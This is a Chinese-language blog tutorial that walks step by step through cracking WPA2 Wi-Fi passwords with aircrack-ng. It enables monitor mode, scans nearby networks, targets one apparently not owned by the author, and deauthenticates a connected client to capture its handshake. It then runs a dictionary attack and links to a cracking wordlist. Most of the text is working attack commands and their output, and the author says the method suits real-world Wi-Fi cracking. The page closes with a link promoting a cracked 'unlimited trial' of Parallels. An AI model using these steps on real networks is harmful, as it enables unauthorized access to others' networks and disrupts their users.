前言:
Aircrack是破解WEP/WEA/WPA2加密的主流工具之一,前面讲过wifite,aircrack-ng套件包含的工具可以用户捕获数据包,握手验证,以及暴力破解和字典攻击。
关于无线密码的破解成功需要以下几点:首先成功捕捉到.cap;需要一个强大的wifi密码破解字典,wifi超强密码破解字典,字典的大小决定了破解的成功率,字典下载(https://yunpan.cn/cSAgLSBhScEJg访问密码4b05);最后就是需要一台跑密码词典的好电脑。
– Aircrack-ng 无线密码破解
– Aireplay-ng 流量生成和客户端认证
– Airodump-ng 数据包捕获
– Airbase-ng 虚假接入点配置
1,查看无线网络名称
#ifocnfig
wlan0
2,把无线网卡的模式改为混杂模式
如果改为混杂模式有报错按照提示结束到影响的进程即可,有些外置网卡不支持混合模式。
(经测试360wifi,百度wifi,腾讯wifi..亲测水星MW150us支持或者)
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 rtl8723be Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 rtl8192cu Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter
3,查看是否设置成为了混杂模式,成功后网卡模式为wlan0mon
#ifocnfig
wlan0mon
4,扫描wifi信号
# airodump-ng wlan0mon
CH 5 ][ Elapsed: 18 s ][ 2016-05-13 23:42
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:FC:68:73:61:74 -73 4 0 0 1 54e. WPA2 CCMP PSK ssssssssssssss
40:16:9F:5A:1E:0A -1 0 0 0 7 -1 <length: 0>
00:25:86:4B:7A:52 -54 50 0 0 6 54e. WPA2 CCMP PSK oxya2809
EC:26:CA:EB:5C:12 -52 54 0 0 11 54e. WPA2 CCMP PSK TP-LINK_FFC0
CC:34:29:2D:A1:F6 -49 56 1 0 6 54e. WPA2 CCMP PSK a405
6C:59:40:90:50:C4 -63 62 64 0 6 54e. WPA2 CCMP PSK LUO
14:75:90:EF:B4:68 -65 32 1 0 6 54e. WPA2 CCMP PSK Chen
8C:F2:28:AA:CE:22 -64 44 0 0 1 54e. WPA2 CCMP PSK CMCC-EDU
30:FC:68:1E:FF:C0 -68 38 0 0 1 54e. WPA2 CCMP PSK TP-LINK_FFC0
D0:0F:6D:30:A5:3B -69 33 0 0 12 54e WPA2 CCMP PSK ChinaNet-NRvE
5C:63:BF:5D:FA:36 -66 24 0 0 6 54e. WPA2 CCMP PSK a406
00:0A:EB:40:20:2C -70 12 0 0 1 54e WPA CCMP PSK Topwa
3C:46:D8:0B:8E:95 -70 22 0 0 1 54e. WPA2 CCMP PSK PSQ
8C:F2:28:A9:DE:EE -71 11 0 0 11 54e. WPA2 CCMP PSK A404
FC:D7:33:37:BF:DE -72 9 0 0 1 54e. WPA2 CCMP PSK yujianxiang603
D0:FA:1D:62:7A:80 -73 7 0 0 1 54e WPA2 CCMP PSK ChenLeWangZhou
5,选择目标AP
# airodump-ng -w LUO -c 11 –bssid 6C:59:40:90:50:C4 wlan0mon
-w LUO: -w后面是指定wifi的名称
-c 11 : -c是信道号, CH对应的数字
–bssid :bssid为wifi名称对应的路由器mac地址
wlan0mon : 开启混合模式的网卡名称
CH 6 ][ Elapsed: 3 mins ][ 2016-05-13 23:58 ][ WPA handshake: 6C:59:40:90:50:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
6C:59:40:90:50:C4 -57 0 1180 483 1 6 54e. WPA2 CCMP PSK L
BSSID STATION PWR Rate Lost Frames Probe
6C:59:40:90:50:C4 AC:F7:F3:5E:A5:93 -1 1e- 0 0 441
6C:59:40:90:50:C4 D0:A6:37:AD:90:C7 -61 1e-24 2 6526
6C:59:40:90:50:C4 B4:30:52:A0:66:EA -1 1e- 0 0 1
6C:59:40:90:50:C4 BC:44:86:60:F1:4C -1 1e- 0 0 1
6,重新打开一个终端,(第五步的终端一直都不能关,否则就捕获不到握手数据包了。)模拟该路由器下的用户对路由器发送认证数据包。这时候看第五步的数据包会不断增加。直到掉线之后重启,就会重新抓取握手包。
# aireplay-ng -0 10 -a 6C:59:40:90:50:C4 -c D0:A6:37:AD:90:C7 wlan0mon
-0 10 : 发送10次认证和数据库消息
-a : 6C:59:40:90:50:C4 BSSID路由器对应的mac地址
-c : D0:A6:37:AD:90:C7 STATION客户端对应的mac地址
23:56:21 Waiting for beacon frame (BSSID: 6C:59:40:90:50:C4) on channel 6
23:56:21 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|65 ACKs]
23:56:22 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|53 ACKs]
23:56:23 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|68 ACKs]
23:56:23 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|42 ACKs]
23:56:24 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|80 ACKs]
23:56:24 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|61 ACKs]
23:56:25 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|55 ACKs]
23:56:26 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|69 ACKs]
23:56:26 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|42 ACKs]
23:56:27 Sending 64 directed ^CAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|34 ACKs]
7,握手包破解
# aircrack-ng -w password.txt LUO-0*1.cap
-w: password.txt为密码字典
LUP-0*.CAP: 捕获数据包所存放的几个文件
Opening LUO-01.cap
Read 548 packets.
No networks found, exiting.
Quitting aircrack-ng…
该文是用于学习测试,并没有真正抓取握手包。成功与否靠强大的字典和运气了,以上方法适用于真实环境中的wifi破解。
以上内容pdf版本下载:Kali下无线密码破解工具Aircrack-ng详解.pdf
![Parallels Desktop 17 for Mac[PDrunner-无限试用版]](https://mrliangqi.oss-cn-beijing.aliyuncs.com/2022/03/iShot_2022-04-30_23.27.19.png?x-oss-process=image/resize,m_fill,h_200,w_300)
